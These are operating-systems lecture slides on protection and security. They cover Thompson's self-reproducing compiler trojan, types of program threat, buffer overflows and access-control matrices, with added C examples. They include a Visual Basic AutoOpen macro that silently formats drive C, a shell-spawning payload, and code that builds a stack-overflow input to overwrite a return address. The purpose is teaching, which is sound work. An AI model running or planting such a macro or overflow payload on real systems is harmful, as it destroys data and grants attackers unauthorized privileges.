Introduction to Protection and Security
CS-3013, Operating Systems, A-term 2009
(Slides include materials from Modern Operating Systems, 3rd ed., by Andrew Tanenbaum and from Operating System Concepts, 7th ed., by Silberschatz, Galvin, & Gagne)
Concepts
• Protection:
  – Mechanisms and policy to keep programs and users from accessing or changing things they should not
  – Internal to the OS
  – §9.1-9.3 in Tanenbaum
• Security:
  – Issues external to the OS
  – Authentication of users, validation of messages, malicious or accidental introduction of flaws, etc.
  – §9.4-9.8 in Tanenbaum
Outline
• The first computer virus
• Some program threats
• Overview of protection mechanisms
The First Computer Virus
• Required reading: Ken Thompson, “Reflections on Trusting Trust,” Communications of the ACM, vol. 27, no. 8, August 1984, pp. 761-763 (pdf)
• Three steps:
  1. A program that prints a copy of itself
  2. Training a compiler to understand a constant
  3. Embedding a Trojan Horse without a trace
Step 1 – Program to print a copy of itself
• How do we do this?
• First, store a character array representing the text of the program (everything that follows the array itself)
• Body of the program:
  – Print the declaration of the character array
  – Loop through the array, printing each character as an element of that declaration
  – Print the entire array as a string
• Result: a general method for a program to reproduce itself to any destination!
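Step 1 carried out in working C, as an added example written for this page (it is not the slides' code and not Thompson's own listing): the text of the whole program is stored as data in `s`, with conversion specifiers standing in for the newlines and the double quotes that cannot appear literally inside a string constant. `quine()` prints the declaration of `s` by printing `s` into itself, then prints the remainder of the body, which is `s` again. Every byte of the file, the leading comment included, is part of the reproduced text, which is why the program carries no further comments.

```c
/* Added example (not from the slides): Thompson step 1, a C program that prints its own source. */
#include <stdio.h>
#include <string.h>
char *s="/* Added example (not from the slides): Thompson step 1, a C program that prints its own source. */%c#include <stdio.h>%c#include <string.h>%cchar *s=%c%s%c;%cint quine(char *out,size_t cap){return snprintf(out,cap,s,10,10,10,34,s,34,10,10,10);}%cint main(void){char b[4096];quine(b,sizeof b);fputs(b,stdout);return 0;}%c";
int quine(char *out,size_t cap){return snprintf(out,cap,s,10,10,10,34,s,34,10,10,10);}
int main(void){char b[4096];quine(b,sizeof b);fputs(b,stdout);return 0;}
```

Compile it, run it, and diff the output against the source file: the two are byte-for-byte identical. The arguments 10 and 34 are the ASCII codes for newline and the double quote, supplied as numbers precisely so that neither character has to appear inside `s`; that is the same trick Step 2 is about to examine, a value the program "knows" without ever spelling it out.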
Step 2 – Teaching constant values to the compiler
The part of the C compiler that reads string constants looks roughly like this:

```c
…
/* reading string constants */
if (s[i++] == '\\')
    if (s[i] == 'n') insert('\n');
    else if (s[i] == 'v') insert('\v');
    else if …
```
• Question: How does the compiler know what integer values to insert for '\n', '\v', etc.?
Step 2 (continued)
• Answer: In the first compiler for this machine type, insert the actual character code
  – i.e., 11 (decimal) for ‘\v’, etc.

```c
/* reading string constants */
if (s[i++] == '\\')
    if (s[i] == 'n') insert('\n');
    else if (s[i] == 'v') insert(11);
    else if …
```
• Next: Use the first compiler to compile itself!
Step 2 (continued)
• Result: a compiler binary that “knows” how to interpret the sequence “\v”
• And so do all compilers derived from this one, forever after!
• Finally: replace the value “11” in the source code of the compiler with ‘\v’ and compile the compiler with itself again
• Note: there is now no trace of the values of the special characters in …
  – The C Programming Language book
  – the source code of the C compiler
• I.e., the special character values are self-reproducing: they live only in the binary and are handed from one compiler binary to the next
Step 3 – Inserting a Trojan Horse
• In the compiler source, add the text
    if (match(sourceString, pattern))
        insert the Trojan Horse code
  where “pattern” is the login code (for example)
• In the compiler source, add the additional text
    if (match(sourceString2, pattern2))
        insert the self-reproducing code
  where “pattern2” is a part of the compiler itself
• Use this compiler to recompile itself, then remove the additions from the source
Step 3 – Concluded
• Result: an infected compiler that will
  a. Insert a Trojan Horse in the login code of any Unix system it compiles
  b. Propagate itself to all future compilers built with it
  c. Leave no trace of the Trojan Horse in its source code
• Like a biological virus:
  – A small bundle of code that uses the compiler’s own reproductive mechanism to propagate itself
Questions?
Program Threats
• Trojan Horse
  – Code segment that misuses its environment
  – Exploits mechanisms that allow programs written by one user to be executed by other users
  – Spyware, pop-up browser windows, covert channels
• Trap Door
  – Specific user identifier or password that circumvents normal security procedures
  – Could be included in a compiler (the Thompson attack above)
• Logic Bomb
  – Program that initiates a security incident under certain circumstances
• Stack and Buffer Overflow
  – Exploits a bug in a program (overflowing either a buffer on the stack or some other memory buffer)
C Program with Buffer-overflow Condition

```c
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 256

int main(int argc, char *argv[])
{
    char buffer[BUFFER_SIZE];

    if (argc < 2)
        return -1;
    else {
        /* No length check: an argument longer than BUFFER_SIZE - 1 bytes runs
           past the end of buffer and over whatever sits above it on the stack */
        strcpy(buffer, argv[1]);
        return 0;
    }
}
```
Layout of Typical Stack Frame (figure; not reproduced in this transcript)
Modified Shell Code

```c
#include <stdio.h>
#include <unistd.h>

/* The attacker's payload: replace the running (privileged) process image with
   a shell. The compiled machine code of this call is what gets planted in the
   overflowed buffer, with the saved return address redirected to it. */
int main(int argc, char *argv[])
{
    char *args[] = { "/bin/sh", NULL };

    (void)argc;
    (void)argv;
    execvp("/bin/sh", args);
    return 0;
}
```
Hypothetical Stack Frame (figure: before attack / after attack; not reproduced in this transcript)
Effect
• If you can con a privileged program (say, one running setuid root) into copying an attacker-supplied string into a buffer with no bounds check, then …
• … the overwritten return address sends control into the planted shell code, and you have just gained the privileges of that program in a shell!
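The two stack-frame figures are missing from this transcript, so the following added example (written for this page, not the course's code) models the frame of the vulnerable program as a struct: the 256-byte buffer, then the saved frame pointer and saved return address that sit just above it on a typical stack. `unsafe_copy()` does what the program's strcpy does, `safe_copy()` is the one-line fix, and `build_attack_input()` constructs the string an attacker would pass as argv[1]. The frame layout, the 8-byte fields, the filler bytes and the fake return value are assumptions chosen to make the overwrite visible; no real address or shell code is involved.

```c
/* Added example (not from the slides): a model of the vulnerable program's
 * stack frame, showing what the unchecked strcpy overwrites and the bounds
 * check that stops it. Layout and sizes are illustrative assumptions. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define BUFFER_SIZE 256

/* Toy frame: the local buffer, then (as on a typical downward-growing stack)
 * the saved frame pointer and the saved return address right above it. */
struct frame_model {
    char     buffer[BUFFER_SIZE];
    uint64_t saved_fp;
    uint64_t saved_ret;
};

/* What strcpy(buffer, argv[1]) does: copy up to and including the NUL with no
 * regard for the buffer's size. Done as one memcpy into the whole struct so
 * the overflow stays inside the object and is well defined for the test. */
void unsafe_copy(struct frame_model *f, const char *input)
{
    size_t n = strlen(input) + 1;          /* strcpy copies the terminator too */
    if (n > sizeof *f)
        n = sizeof *f;                     /* the model ends here; a real stack would not */
    memcpy(f, input, n);
}

/* The fix: refuse any input that does not fit together with its terminator.
 * Nothing is written on rejection, so the saved registers are never touched. */
int safe_copy(struct frame_model *f, const char *input)
{
    size_t len = strlen(input);
    if (len >= sizeof f->buffer)
        return -1;
    memcpy(f->buffer, input, len + 1);
    return 0;
}

/* Attacker's argv[1]: BUFFER_SIZE filler bytes, 8 bytes that land on the saved
 * frame pointer, then the 8 raw bytes of fake_ret that become the new return
 * address. fake_ret must contain no zero byte or strlen/strcpy would stop early.
 * Returns the payload length, or -1 if out is too small. */
int build_attack_input(char *out, size_t cap, uint64_t fake_ret)
{
    size_t len = BUFFER_SIZE + 8 + 8;
    if (cap < len + 1)
        return -1;
    memset(out, 'A', BUFFER_SIZE + 8);
    memcpy(out + BUFFER_SIZE + 8, &fake_ret, sizeof fake_ret);
    out[len] = '\0';
    return (int)len;
}

int main(void)
{
    struct frame_model f = { {0}, 0, 0x1000 };   /* 0x1000: pretend legitimate return address */
    char payload[BUFFER_SIZE + 32];

    build_attack_input(payload, sizeof payload, 0x4242424242424242ULL);
    printf("before attack:     saved_ret = 0x%llx\n", (unsigned long long)f.saved_ret);
    unsafe_copy(&f, payload);
    printf("after unsafe_copy: saved_ret = 0x%llx\n", (unsigned long long)f.saved_ret);

    f.saved_ret = 0x1000;
    printf("safe_copy: %s, saved_ret = 0x%llx\n",
           safe_copy(&f, payload) == 0 ? "accepted" : "rejected",
           (unsigned long long)f.saved_ret);
    return 0;
}
```

Run it and the second line shows `saved_ret` replaced by 0x4242424242424242, the attacker's value, which is exactly the "after attack" state of the figure; the third line shows the checked version rejecting the same input with the return address intact. On a real stack the function would return into whatever the attacker chose, typically the shell code on the previous slide.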
Program Threats – Viruses
• Code fragment embedded in legitimate programs
• Very specific to CPU architecture, operating system, applications
• Usually borne via email or as a macro
• E.g., Visual Basic macro to reformat the hard drive:

```vb
Sub AutoOpen()
Dim oFS
Set oFS = CreateObject("Scripting.FileSystemObject")
vs = Shell("c:command.com /k format c:", vbHide)
End Sub
```
Program Threats (Cont.)
• Virus dropper inserts the virus onto the system
• Many categories of viruses, literally many thousands of viruses
  – File
  – Boot
  – Macro
  – Polymorphic
  – Source code
  – Encrypted
  – Stealth
  – Tunneling
  – Multipartite
  – Armored
Questions?
Goals of Protection
• Operating system consists of a collection of objects (hardware or software)
• Each object has a unique name and can be accessed through a well-defined set of operations.
• Protection problem – to ensure that each object is accessed correctly and only by those processes that are allowed to do so.
Guiding Principles of Protection
• Principle of least privilege
  – Programs, users and systems should be given just enough privileges to perform their tasks
• Separate policy from mechanism
  – Mechanism: the stuff built into the OS to make protection work
  – Policy: the data that says who can do what to whom
Domain Structure
• Access-right = <object-name, rights-set>, where rights-set is a subset of all valid operations that can be performed on the object.
• Domain = set of access-rights
Conceptual Representation – Access Matrix
• View protection as a matrix (access matrix)
• Rows represent domains
• Columns represent objects
• Access(i, j) is the set of operations that a process executing in Domain i can invoke on Object j
Textbook Access Matrix
• Columns are access control lists (ACLs)
  – Associated with each object
• Rows are capabilities
  – Associated with each user, group, or domain
Unix & Linux
• System comprises many domains:
  – Each user
  – Each group
  – Kernel/System
• (Windows has even more domains than this!)
Unix/Linux Matrix

| Domain        | file1 | file2 | file3 | device | domain |
|---------------|-------|-------|-------|--------|--------|
| User/Domain 1 | r     | rx    | rwx   | –      | enter  |
| User/Domain 2 | r     | x     | rx    | rwx    | –      |
| User/Domain 3 | rw    | –     | –     | –      | –      |
| …             |       |       |       |        |        |

• Columns are access control lists (ACLs)
  – Associated with each object
• Rows are capabilities
  – Associated with each user or each domain
Changing Domains (Unix)
• Domain = uid or gid
• Domain switch via file access controls
  – Each executable file can carry a domain bit (the setuid bit; setgid for groups); ls -l shows it as an s in place of the owner’s x (rws instead of rwx)
  – When a setuid file is executed, the effective uid (or, for setgid, the effective gid) of the new process is set to the owner (or group) of the file for the life of that process
  – The switch is per-process: when that process exits nothing of it remains, and the user’s other processes never held the borrowed identity
• Separate mechanism for entering the kernel domain
  – System call interface
General (textbook) representation
• Domains as objects added to Access Matrix
Practicalities
• At run-time…
  – What does the OS know about the user?
  – What does the OS know about the resources?
• What is the cost of checking and enforcing?
  – Access to the data
  – Cost of searching for a match
• Impractical to implement the full Access Matrix
  – Size
  – Access controls disjoint from both objects and domains
ACLs vs. Capabilities
• Access Control List: Focus on resources
  – Good if resources greatly outnumber users
  – Can be implemented with minimal caching
  – Can be attached to objects (e.g., file metadata)
  – Good when the user who creates a resource has authority over it
• Capability System: Focus on users
  – Good if users greatly outnumber resources
  – Lots of information caching is needed
  – Good when a system manager has control over all resources
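The Unix/Linux Matrix slide and the ACLs vs. Capabilities slide describe one matrix read two ways. The following added example (written for this page, not taken from the course or either textbook) holds the slide's table in the slide's own notation, parses each cell into a rights mask, and derives both views from it: `acl_for_object()` walks a column, `capabilities_for_domain()` walks a row, and the two check functions answer the same question from either side, with the search cost of each visible in the code. The `enter` right in the `domain` column is kept exactly as the slide shows it; which domain it enters is not stated on the slide and is not modelled.

```c
/* Added example (not from the slides): the access matrix from the Unix/Linux
 * slide, with the ACL view (a column) and the capability view (a row) derived
 * from the same table so the two representations can be compared. */
#include <stdio.h>
#include <string.h>

#define NDOMAINS 3
#define NOBJECTS 5

enum right { R_READ = 1u, R_WRITE = 2u, R_EXEC = 4u, R_ENTER = 8u };

static const char *object_names[NOBJECTS] =
    { "file1", "file2", "file3", "device", "domain" };

/* The slide's table, cell for cell; "-" means no access. */
static const char *slide_matrix[NDOMAINS][NOBJECTS] = {
    { "r",  "rx", "rwx", "-",   "enter" },   /* Domain 1 */
    { "r",  "x",  "rx",  "rwx", "-"     },   /* Domain 2 */
    { "rw", "-",  "-",   "-",   "-"     },   /* Domain 3 */
};

/* One cell of the slide -> rights bitmask. Unknown letters grant nothing. */
unsigned parse_rights(const char *cell)
{
    unsigned rights = 0;
    if (strcmp(cell, "enter") == 0)
        return R_ENTER;
    for (; *cell; cell++) {
        if (*cell == 'r') rights |= R_READ;
        else if (*cell == 'w') rights |= R_WRITE;
        else if (*cell == 'x') rights |= R_EXEC;
    }
    return rights;
}

/* An entry of either list: the domain (in an ACL) or the object (in a
 * capability list), together with the rights granted. */
struct entry { int id; unsigned rights; };

/* ACL view: the column for one object, one entry per domain with any right. */
size_t acl_for_object(int object, struct entry *out, size_t cap)
{
    size_t n = 0;
    for (int d = 0; d < NDOMAINS && n < cap; d++) {
        unsigned r = parse_rights(slide_matrix[d][object]);
        if (r) { out[n].id = d; out[n].rights = r; n++; }
    }
    return n;
}

/* Capability view: the row for one domain, one entry per reachable object. */
size_t capabilities_for_domain(int domain, struct entry *out, size_t cap)
{
    size_t n = 0;
    for (int o = 0; o < NOBJECTS && n < cap; o++) {
        unsigned r = parse_rights(slide_matrix[domain][o]);
        if (r) { out[n].id = o; out[n].rights = r; n++; }
    }
    return n;
}

/* The check an ACL-based system makes: find the caller's domain on the
 * object's list. Cost grows with the number of domains that can reach it. */
int allowed_via_acl(int domain, int object, unsigned right)
{
    struct entry acl[NDOMAINS];
    size_t n = acl_for_object(object, acl, NDOMAINS);
    for (size_t i = 0; i < n; i++)
        if (acl[i].id == domain)
            return (acl[i].rights & right) == right;
    return 0;                                   /* default: no access */
}

/* The check a capability system makes: find the object among the domain's
 * capabilities. Cost grows with the number of objects the domain holds. */
int allowed_via_capabilities(int domain, int object, unsigned right)
{
    struct entry caps[NOBJECTS];
    size_t n = capabilities_for_domain(domain, caps, NOBJECTS);
    for (size_t i = 0; i < n; i++)
        if (caps[i].id == object)
            return (caps[i].rights & right) == right;
    return 0;
}

int main(void)
{
    struct entry list[NOBJECTS];
    size_t n = capabilities_for_domain(0, list, NOBJECTS);
    printf("Domain 1 holds %zu capabilities:", n);
    for (size_t i = 0; i < n; i++)
        printf(" %s", object_names[list[i].id]);
    printf("\nDomain 2 may write device: %d, may write file3: %d\n",
           allowed_via_acl(1, 3, R_WRITE), allowed_via_capabilities(1, 2, R_WRITE));
    return 0;
}
```

The default-deny in both check functions is the "default should be no access" rule from the Saltzer-Schroeder slide later on: an absent entry and an explicit "-" cell behave identically. The two walks also make the tradeoff on this slide concrete: the ACL for `file3` is short because few domains touch it, while the capability list of a domain that can reach many objects would be the long one.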
Both are needed
• ACLs for files and other proliferating resources
• Capabilities for major system functions
• The common OSs offer BOTH
  – Linux emphasizes an ACL model
    • provides good control over files and resources that are file-like
  – Windows 2000/XP emphasize Capabilities
    • provides good control over access to system functions (e.g. creating a new user, or doing a system backup…)
    • Access control lists for files
…and good management, too!
• What do we need to know to set up a new user or to change their rights?
• …to set up a new resource or to change the rights of its users?
• …Who has the right to set/change access rights?
• No OS allows you to implement all the possible policies easily.
Enforcing Access Control
• User level privileges must always be less than OS privileges!
  – For example, a user should not be allowed to grab exclusive control of a critical device
  – or write to OS memory space
• …and the user cannot be allowed to raise his privilege level!
• The OS must enforce it…and the user must not be able to bypass the controls
• In most modern operating systems, the code which manages the resource enforces the policy
(Traditional) Requirements – System Call Code
• No user can interrupt it while it is running
• No user can feed it data to make it
  – violate access control policies
  – stop serving other users
• No user can replace or alter any system call code
• No user can add functionality to the OS!
• Data must NEVER be treated as code!
“Yeah, but …”
• No user can interrupt it while it is running
  – Windows, Linux routinely interrupt system calls
• No user can feed it data to make it
  – violate access control policies
  – stop serving other users
• No user can replace or alter any system call code
  – Except your average virus
• No user can add functionality to the OS!
  – Except dynamically loaded device drivers
• Data must NEVER be treated as code!
  – “One man’s code is another man’s data” – A. Perlis
Saltzer-Schroeder Guidelines
• System design should be public
• Default should be no access
• Check current authority – no caching!
• Protection mechanism should be
  – Simple, uniform, built into the lowest layers of the system
• Least privilege possible for processes
• Psychologically acceptable
• KISS!
Reading Assignment
Tanenbaum, Chapter 9
Questions?